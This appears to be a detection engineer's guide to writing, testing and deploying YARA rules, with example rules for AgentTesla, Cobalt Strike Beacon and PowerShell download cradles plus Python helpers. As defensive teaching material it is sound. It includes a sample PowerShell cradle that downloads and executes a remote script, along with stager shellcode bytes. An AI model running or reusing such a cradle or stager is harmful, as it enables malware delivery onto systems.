Overview
YARA is a de facto standard for pattern-based malware classification and detection. A well-written YARA rule can identify a malware family across samples even when file hashes change, because it targets the underlying code patterns, strings, and structural features that threat actors reuse.
This project covers:
- The methodology for authoring effective YARA rules
- Rules developed for malware families and tools observed in regional campaigns
- Testing and validation procedures before deployment
- Integration with SIEM, EDR, and sandbox platforms
YARA Rule Authoring Methodology
Writing a rule that fires on real malware without generating false positives requires a structured approach.
Step 1 — Collect samples
Start with at least 3–5 samples from the same family. Sources:
- MalwareBazaar (abuse.ch) — free, tagged by family
- VirusTotal — search by behaviour or YARA match
- Any.run — pull samples from public sandbox sessions
- Internal SIEM/EDR — malware that actually hit your environment
Step 2 — Static analysis — find unique strings
|
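# Extract printable ASCII strings (8+ chars) from each sample; comm needs sorted input
strings -n 8 sample1.exe | sort -u > strings_sample1.txt
strings -n 8 sample2.exe | sort -u > strings_sample2.txt
# Windows malware often stores UTF-16LE ("wide") strings; GNU strings extracts them with -e l
strings -n 8 -e l sample1.exe | sort -u > wide_strings_sample1.txt
# Keep only strings common to both samples
comm -12 strings_sample1.txt strings_sample2.txt > common_strings.txt
# Drop strings also found in clean binaries (clean_strings.txt: a sorted list built the same way from known-good files)
comm -23 common_strings.txt clean_strings.txt > candidate_strings.txt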
|
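The shell pipeline above compares two samples at a time. The following Python sketch applies the same idea to any number of samples. It assumes the samples and the clean baseline are already loaded as bytes. It extracts ASCII and UTF-16LE runs (roughly what strings -n 8 and strings -n 8 -e l produce), keeps the strings present in every sample, and drops anything also seen in the clean set. The function names are illustrative and not part of any tool.

```python
import re
from functools import reduce


def ascii_strings(data: bytes, min_len: int = 8) -> set:
    """Printable ASCII runs of at least min_len bytes (like strings -n 8)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return {m.decode("ascii") for m in re.findall(pattern, data)}


def wide_strings(data: bytes, min_len: int = 8) -> set:
    """UTF-16LE runs: a printable byte followed by 0x00, repeated min_len+ times."""
    pattern = rb"(?:[\x20-\x7e]\x00){%d,}" % min_len
    return {m.decode("utf-16-le") for m in re.findall(pattern, data)}


def all_strings(data: bytes, min_len: int = 8) -> set:
    return ascii_strings(data, min_len) | wide_strings(data, min_len)


def candidate_strings(samples: list, clean: list, min_len: int = 8) -> set:
    """Strings found in every sample but in none of the clean files."""
    common = reduce(set.intersection, (all_strings(s, min_len) for s in samples))
    baseline = set().union(*(all_strings(c, min_len) for c in clean))
    return common - baseline
```

Like the shell version, this is only a starting point. Every candidate still needs a manual check, because two samples can share library or compiler strings that your clean set happens not to contain.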
Strings worth targeting:
- Mutex names (malware often uses a unique mutex to prevent double-execution)
- Registry keys used for persistence
- C2 URL patterns (even partial paths like /gate.php)
- Custom user-agent strings
- Hardcoded error messages or debug strings
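To triage a long candidate list, simple regular expressions can pre-sort strings into the categories above. The patterns below are hypothetical heuristics chosen for illustration. For example, they treat a Global\ or Local\ prefix as a likely mutex name, even though other named kernel objects use the same prefixes. Expect both misses and false hits, and review every result by hand.

```python
import re

# Hypothetical heuristics, one per category in the list above
CATEGORIES = {
    "mutex": re.compile(r"^(?:Global|Local)\\"),
    "registry_run_key": re.compile(r"\\CurrentVersion\\Run(?:Once)?\b", re.IGNORECASE),
    "c2_path": re.compile(r"/[\w.-]+\.php\b|/gate\b", re.IGNORECASE),
    "user_agent": re.compile(r"^Mozilla/\d\.\d \("),
    "debug_message": re.compile(r"\b(?:error|failed|debug)\b", re.IGNORECASE),
}


def categorize(strings):
    """Map each category to the sorted candidate strings its heuristic matches."""
    result = {}
    for name, regex in CATEGORIES.items():
        hits = sorted(s for s in strings if regex.search(s))
        if hits:
            result[name] = hits
    return result
```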
Step 3 — Binary pattern analysis
|
# Open the sample in radare2; -A runs full analysis (aaa) on load
r2 -A sample.exe
[0x00401000]> pd 20 @ entry0   # Disassemble 20 instructions at the entry point
[0x00401000]> /x 4d5a          # Search for MZ bytes, e.g. an embedded second-stage PE
# Or use FLOSS to recover obfuscated and stack strings
floss sample.exe > floss_output.txt
|
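Once you find a distinctive instruction sequence (for example, by dumping its bytes with radare2's p8 command), wildcard any operand bytes that change between builds before putting the sequence into a rule. Stack-frame sizes and relative call offsets are typical examples. The small Python helper below renders bytes as a YARA hex string, assuming you already know which byte offsets vary. The example bytes are made up for illustration.

```python
def to_yara_hex(code: bytes, wildcard_offsets=()) -> str:
    """Render bytes as a YARA hex string, replacing the given offsets with ??."""
    masked = set(wildcard_offsets)
    tokens = ["??" if i in masked else f"{b:02X}" for i, b in enumerate(code)]
    return "{ " + " ".join(tokens) + " }"


# Hypothetical example bytes: push ebp; mov ebp, esp; sub esp, 0x20;
# push ebx; push esi; push edi; call rel32
prologue = bytes.fromhex("558BEC83EC20535657E810320000")
# Offset 5 is the sub esp immediate; offsets 10-13 are the call's relative target
print(to_yara_hex(prologue, [5, 10, 11, 12, 13]))
# { 55 8B EC 83 EC ?? 53 56 57 E8 ?? ?? ?? ?? }
```

With those offsets masked, the output is the same pattern used as $packed_stub in Step 4.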
Step 4 — Write the rule
|
rule Malware_Family_Name {
    meta:
        description = "Detects [Family] based on mutex, PDB path, and C2 pattern"
        author = "Mohammad Al Sayegh"
        date = "2026-03-01"
        hash1 = "[SHA-256 of a reference sample]"  // placeholder: replace with a real sample hash
        tlp = "CLEAR"  // TLP 2.0 equivalent of WHITE
        mitre_att_ck = "T1059.003, T1547.001"
    strings:
        $mutex = "Global\\MutexName_12AB" ascii wide
        $pdb_path = "C:\\Users\\dev\\malware\\Release\\payload.pdb" ascii
        $c2_pattern = "/api/v2/gate?uid=" ascii
        $reg_key = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater" ascii wide
        $packed_stub = { 55 8B EC 83 EC ?? 53 56 57 E8 ?? ?? ?? ?? }
    condition:
        uint16(0) == 0x5A4D  // "MZ" header: DOS/PE executable
        and filesize < 5MB
        and (
            $mutex or $pdb_path or $c2_pattern
            or ($reg_key and $packed_stub)
        )
}
|
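To make the condition's semantics concrete, here is a rough Python model of this template rule. It is an illustration only, not how YARA evaluates rules internally. Text strings are searched as plain ASCII bytes and, where the rule says wide, also as UTF-16LE bytes. The hex string's ?? wildcards become regex dots. uint16(0) is read as a little-endian integer, which is why the two bytes "MZ" compare equal to 0x5A4D.

```python
import re
import struct

MB = 1024 * 1024  # YARA's MB suffix is 2**20 bytes


def has_text(data: bytes, text: str, wide: bool = False) -> bool:
    """Rough stand-in for a YARA text string: ASCII bytes, plus UTF-16LE if wide."""
    if text.encode("ascii") in data:
        return True
    return wide and text.encode("utf-16-le") in data


# $packed_stub = { 55 8B EC 83 EC ?? 53 56 57 E8 ?? ?? ?? ?? }; each ?? becomes "."
PACKED_STUB = re.compile(rb"\x55\x8B\xEC\x83\xEC.\x53\x56\x57\xE8....", re.DOTALL)


def template_rule_matches(data: bytes) -> bool:
    # uint16(0) == 0x5A4D: first two bytes read little-endian, so b"MZ" -> 0x5A4D
    if len(data) < 2 or struct.unpack_from("<H", data, 0)[0] != 0x5A4D:
        return False
    if len(data) >= 5 * MB:  # filesize < 5MB
        return False
    mutex = has_text(data, "Global\\MutexName_12AB", wide=True)
    pdb_path = has_text(data, "C:\\Users\\dev\\malware\\Release\\payload.pdb")
    c2_pattern = has_text(data, "/api/v2/gate?uid=")
    reg_key = has_text(data, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater", wide=True)
    packed_stub = PACKED_STUB.search(data) is not None
    return mutex or pdb_path or c2_pattern or (reg_key and packed_stub)
```

The final line mirrors the rule's grouping: any one of the three high-confidence strings is enough. The registry key alone is not, because many legitimate installers write Run keys, so it must be paired with the code pattern.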
Step 5 — Test before deployment
|
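# Test against known-bad samples (should ALL match)
yara -r rule.yar /path/to/malware_samples/
# List the samples the rule MISSED: -n prints only rules that did not match
yara -r -n rule.yar /path/to/malware_samples/
# Test against clean binaries (should produce ZERO matches)
yara -r rule.yar /path/to/clean_windows_binaries/
# On Windows, run the Windows build of YARA (e.g. yara64.exe) against the system directory
yara64.exe -r rule.yar C:\Windows\System32
# Test performance (rules with complex regex can be slow)
time yara -r rule.yar /large/file/corpus/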
|
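Reading raw yara output gets tedious with dozens of samples. The minimal sketch below parses the default output format, which is one "<rule> <path>" line per match (no -s, -m or -g flags). It then lists the known-bad samples a rule missed. It assumes the output was captured from a run such as yara -r rule.yar /path/to/malware_samples/. Paths are normalised because the printed form can differ slightly from how you list the directory.

```python
import os


def matched_paths(yara_output: str, rule: str) -> set:
    """File paths from default yara output lines of the form '<rule> <path>'."""
    paths = set()
    for line in yara_output.splitlines():
        # Rule identifiers cannot contain spaces, so the first space ends the name
        name, _, path = line.partition(" ")
        if name == rule and path:
            paths.add(os.path.normpath(path))
    return paths


def missed_samples(sample_paths, yara_output: str, rule: str) -> list:
    """Known-bad samples the rule did not match (ideally an empty list)."""
    hits = matched_paths(yara_output, rule)
    return sorted(p for p in sample_paths if os.path.normpath(p) not in hits)
```

In practice, the output could come from subprocess.run(["yara", "-r", "rule.yar", samples_dir], capture_output=True, text=True).stdout, compared against a directory listing of samples_dir. For the clean corpus, matched_paths on that run's output should return an empty set.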
Example Rules
Rule 1 — AgentTesla Keylogger
AgentTesla is a widely used commodity .NET keylogger and information stealer sold on underground forums. It is frequently weaponised in phishing campaigns targeting the Middle East.
|
rule AgentTesla_Keylogger {
    meta:
        description = "Detects AgentTesla keylogger based on .NET namespace, SMTP exfil, keylogging, and credential-theft strings"
        author = "Mohammad Al Sayegh"
        date = "2026-01-10"
        mitre_att_ck = "T1056.001, T1071.003"
        reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla"
    strings:
        // SMTP exfiltration strings: hardcoded in many variants
        // (.NET string literals are stored as UTF-16LE, hence wide)
        $smtp1 = "smtp.gmail.com" ascii wide nocase
        $smtp2 = "mail.yahoo.com" ascii wide nocase
        $smtp3 = "smtp.mail.ru" ascii wide nocase
        // Keylogger capability strings
        $kl1 = "GetAsyncKeyState" ascii  // P/Invoke import name, stored as single-byte text in metadata
        $kl2 = "[Shift]" ascii wide
        $kl3 = "[Caps Lock]" ascii wide
        $kl4 = "[Backspace]" ascii wide
        // .NET artifact: common namespace
        $ns1 = "AgentTesla" ascii wide
        $ns2 = "Tesla.Keylogger" ascii wide
        // Credential theft targets: generic words that also appear in benign
        // software, so the condition only uses them together with $kl*
        $cred1 = "filezilla" ascii wide nocase
        $cred2 = "chrome" ascii wide nocase
        $cred3 = "outlook" ascii wide nocase
    condition:
        uint16(0) == 0x5A4D
        and filesize < 3MB
        and (
            ($ns1 or $ns2)
            or (2 of ($smtp*) and 2 of ($kl*))
            or (2 of ($cred*) and 1 of ($kl*))
        )
}
|
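The ascii and wide modifiers matter for a .NET family like AgentTesla. String literals in a .NET assembly live in the #US (user strings) heap encoded as UTF-16LE, so a text string marked only ascii will not find them. API names used through P/Invoke, such as GetAsyncKeyState, sit in the metadata as single-byte text. The small Python model of YARA's "N of ($set*)" counting below shows the difference. It is a simplification that ignores YARA's other modifiers.

```python
def count_present(data: bytes, texts, wide: bool = True, nocase: bool = False) -> int:
    """Count how many of `texts` occur in `data`, like YARA's 'N of ($set*)'.

    Each text is searched as ASCII bytes and, if wide=True, as UTF-16LE bytes.
    nocase lowercases both sides (ASCII letters only, as bytes.lower() does).
    """
    haystack = data.lower() if nocase else data
    found = 0
    for text in texts:
        needle = text.lower() if nocase else text
        forms = [needle.encode("ascii")]
        if wide:
            forms.append(needle.encode("utf-16-le"))
        if any(form in haystack for form in forms):
            found += 1
    return found


# A .NET literal such as "[Shift]" is stored as UTF-16LE in the #US heap
user_strings = "[Shift]".encode("utf-16-le") + "[Backspace]".encode("utf-16-le")
keys = ["[Shift]", "[Caps Lock]", "[Backspace]"]
ascii_only = count_present(user_strings, keys, wide=False)
with_wide = count_present(user_strings, keys)
print(ascii_only, with_wide)  # 0 2
```

With ascii alone, "2 of ($kl*)" can never be satisfied by these literals. Adding wide lets both of them count.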
Rule 2 — Cobalt Strike Beacon (Default Config)
Cobalt Strike is a legitimate penetration testing tool that has been heavily adopted by threat actors. Default configurations leave identifiable artifacts.
|
rule CobaltStrike_Beacon_Default {
    meta:
        description = "Detects Cobalt Strike Beacon with default or near-default configuration"
        author = "Mohammad Al Sayegh"
        date = "2026-01-22"
        mitre_att_ck = "T1071.001, T1573.002"
        reference = "https://www.cobaltstrike.com"
    strings:
        // Default sleep/jitter strings in beacon config
        $sleep = "%d (seconds)" ascii
        $jitter = "Set %s.Metadata" ascii
        // Common default C2 URIs in many leaked/cracked versions
        $uri1 = "/updates.rss" ascii
        $uri2 = "/dpixel" ascii
        $uri3 = "/______util.js" ascii
        $uri4 = "/jquery-3.3.1.slim.min.js" ascii
        // Beacon shellcode staging pattern
        $shellcode = { FC E8 8? 00 00 00 60 89 E5 31 D2 64 8B 52 30 }
        // Named pipe for SMB beacon
        $pipe = "\\\\.\\pipe\\msagent_" ascii wide
    condition:
        // Every declared string must be referenced, or YARA refuses to compile the rule
        (uint16(0) == 0x5A4D and filesize < 10MB
            and (2 of ($uri*)
                or ($shellcode and 1 of ($uri*))
                or ($sleep and $jitter and 1 of ($uri*))))
        or ($pipe and $shellcode)
}
|
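YARA hex strings can wildcard a single nibble. For example, 8? in the $shellcode pattern accepts any byte from 0x80 to 0x8F, presumably to tolerate small differences in the stager's first call offset. The sketch below converts simple hex strings (no jumps or alternatives) into Python byte regexes. This is handy for checking a pattern against a carved buffer outside YARA. It is an illustrative helper, not part of YARA or yara-python.

```python
import re


def yara_hex_to_regex(hex_string: str) -> re.Pattern:
    """Compile a simple YARA hex string (no jumps or alternatives) into a bytes regex."""
    parts = []
    for tok in hex_string.strip("{} \n").split():
        if tok == "??":                        # any byte
            parts.append(b".")
        elif tok[1] == "?":                    # high nibble fixed: 8? = 0x80..0x8F
            hi = int(tok[0], 16) << 4
            parts.append(b"[" + re.escape(bytes([hi])) + b"-"
                         + re.escape(bytes([hi | 0x0F])) + b"]")
        elif tok[0] == "?":                    # low nibble fixed: ?8 = 0x08, 0x18, ... 0xF8
            lo = int(tok[1], 16)
            choices = b"".join(re.escape(bytes([h << 4 | lo])) for h in range(16))
            parts.append(b"[" + choices + b"]")
        else:                                  # exact byte
            parts.append(re.escape(bytes([int(tok, 16)])))
    # DOTALL so "." also matches 0x0A (newline) bytes
    return re.compile(b"".join(parts), re.DOTALL)


shellcode = yara_hex_to_regex("{ FC E8 8? 00 00 00 60 89 E5 31 D2 64 8B 52 30 }")
carved = b"\x90\x90" + bytes.fromhex("FCE8890000006089E531D2648B5230")
print(shellcode.search(carved) is not None)  # True
```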
Rule 3 — PowerShell Download Cradle (Generic)
Download cradles are short PowerShell one-liners used across many campaigns to fetch and run second-stage payloads. This rule combines common cradle keywords with encoding and execution-policy bypass patterns.
|
rule PowerShell_Download_Cradle {
    meta:
        description = "Detects common PowerShell download cradle patterns used in phishing and initial access"
        author = "Mohammad Al Sayegh"
        date = "2026-02-05"
        mitre_att_ck = "T1059.001, T1105"
    strings:
        // Invoke-Expression variants (alias, full cmdlet name, scriptblock)
        $iex1 = "IEX" ascii nocase
        $iex2 = "Invoke-Expression" ascii nocase
        $iex3 = "&([scriptblock]::Create(" ascii nocase
        // Download methods ("WebClient" also matches inside "Net.WebClient")
        $dl1 = "DownloadString" ascii nocase
        $dl2 = "DownloadFile" ascii nocase
        $dl3 = "WebClient" ascii nocase
        $dl4 = "Invoke-WebRequest" ascii nocase
        // Bypass techniques
        $bp1 = "bypass" ascii nocase
        $bp2 = "-EncodedCommand" ascii nocase
        $bp3 = "Set-ExecutionPolicy" ascii nocase
        // Long Base64 run: often an encoded payload, but also found in benign
        // scripts; a regex with no fixed literal like this one can slow scanning
        $b64 = /[A-Za-z0-9+\/]{100,}={0,2}/ ascii
    condition:
        filesize < 500KB
        and (
            (1 of ($iex*) and 1 of ($dl*))
            or (1 of ($iex*) and $b64 and 1 of ($bp*))
            or (2 of ($dl*) and 1 of ($bp*))
        )
}
|
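The $b64 string is a hint, not proof, because Base64 also appears in benign scripts. When it fires, decoding the run usually settles the question. powershell.exe -EncodedCommand expects Base64 of the script's UTF-16LE bytes. The minimal Python sketch below round-trips and inspects such payloads. Its regex mirrors $b64, and the sample command is made up.

```python
import base64
import re

# Same shape as the rule's $b64 regex: 100+ Base64 characters, optional padding
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{100,}={0,2}")


def encode_command(script: str) -> str:
    """Build what powershell.exe -EncodedCommand expects: Base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_runs(data: bytes) -> list:
    """Decode every long Base64 run in `data` that turns out to be UTF-16LE text."""
    scripts = []
    for run in B64_RUN.findall(data):
        try:
            scripts.append(base64.b64decode(run, validate=True).decode("utf-16-le"))
        except ValueError:  # binascii.Error and UnicodeDecodeError both subclass it
            continue
    return scripts


# Hypothetical cradle, encoded the way an attacker would pass it on the command line
cradle = "IEX (New-Object Net.WebClient).DownloadString('http://example.com/a.ps1')"
command_line = b"powershell -EncodedCommand " + encode_command(cradle).encode("ascii")
print(decode_runs(command_line) == [cradle])  # True
```

Decoded scripts can then be scanned again with the same rule, since the plaintext exposes the IEX and DownloadString keywords that the encoded form hides.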
Testing Framework
Before a rule is deployed to production scanners, it must pass three gates:
|
# wc -l counts one line per matching rule per file, so test one rule per .yar file
# Gate 1 (true positive rate): must match ≥ 95% of known samples
yara -r rule.yar /samples/family_name/ | wc -l   # Must be ≥ 0.95 × sample count
# Gate 2 (false positive rate): must produce 0 matches on the clean corpus
yara -r rule.yar /corpus/windows_clean/ | wc -l  # Must be 0
yara -r rule.yar /corpus/office_suite/ | wc -l   # Must be 0
# Gate 3 (performance): must complete within 500 ms per 100 MB
time yara rule.yar /test/100mb_file.bin
|
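Once the counts and timings are collected, the three gates reduce to simple arithmetic. The sketch below applies the thresholds stated above. The GateResults fields are hypothetical names. "100 MB" is taken as 100 * 1024 * 1024 bytes, matching YARA's own MB suffix, and the scan time is normalised so that runs over inputs of other sizes can be compared.

```python
from dataclasses import dataclass

MIB_100 = 100 * 1024 * 1024  # "100 MB" in YARA's binary sense


@dataclass
class GateResults:
    samples_total: int     # known-bad samples in the test set
    samples_matched: int   # how many of them the rule matched
    clean_matches: int     # matches across all clean corpora
    scan_seconds: float    # wall-clock time reported by `time`
    scanned_bytes: int     # size of the data scanned in that timed run


def evaluate_gates(r: GateResults) -> dict:
    """Apply the three deployment gates; every value must be True to deploy."""
    tp_rate = r.samples_matched / r.samples_total
    ms_per_100mb = r.scan_seconds * 1000 * MIB_100 / r.scanned_bytes
    return {
        "gate1_true_positive_rate": tp_rate >= 0.95,
        "gate2_zero_false_positives": r.clean_matches == 0,
        "gate3_performance": ms_per_100mb <= 500,
    }
```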
Integrating YARA with Your Stack
CrowdStrike Custom IOA
YARA rules are not directly supported as Custom IOAs or IOCs. Instead, upload the hashes of files your rule matched as Custom IOCs of type file hash, or use the Intel API to correlate those hashes against CrowdStrike’s telemetry.
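Either route starts from file hashes. The minimal sketch below computes deduplicated SHA-256 values for the files a rule matched, for example paths parsed from yara -r output. The upload itself is left out because it depends on your Falcon console or API client setup.

```python
import hashlib
from pathlib import Path


def sha256_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """Stream a file through SHA-256 so large samples need not fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def ioc_hashes(matched_files) -> list:
    """Unique, sorted SHA-256 hashes for the files a YARA rule matched."""
    return sorted({sha256_file(Path(p)) for p in matched_files})
```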
Splunk + YARA via TA
The Splunk YARA TA allows scanning file paths or stream data against YARA rules and generating alerts when a match fires.
Any.run / Cuckoo Sandbox
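Both platforms accept YARA rules for automated classification. For Cuckoo, place rules in the yara/ directory of its working directory (yara/binaries/ for rules run against submitted files in Cuckoo 2.x); the signatures/ folder holds Python behavioural signatures, not YARA rules. For Any.run, upload rules to Any.run’s YARA manager.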
MISP
MISP has native YARA rule support. Store rules as yara typed attributes on threat actor or malware family events, and share with your ISAC or trusted partners under appropriate TLP.
All rules are provided for defensive, detection, and research purposes. Contact me at contact@malsayegh.ae to collaborate on detection development.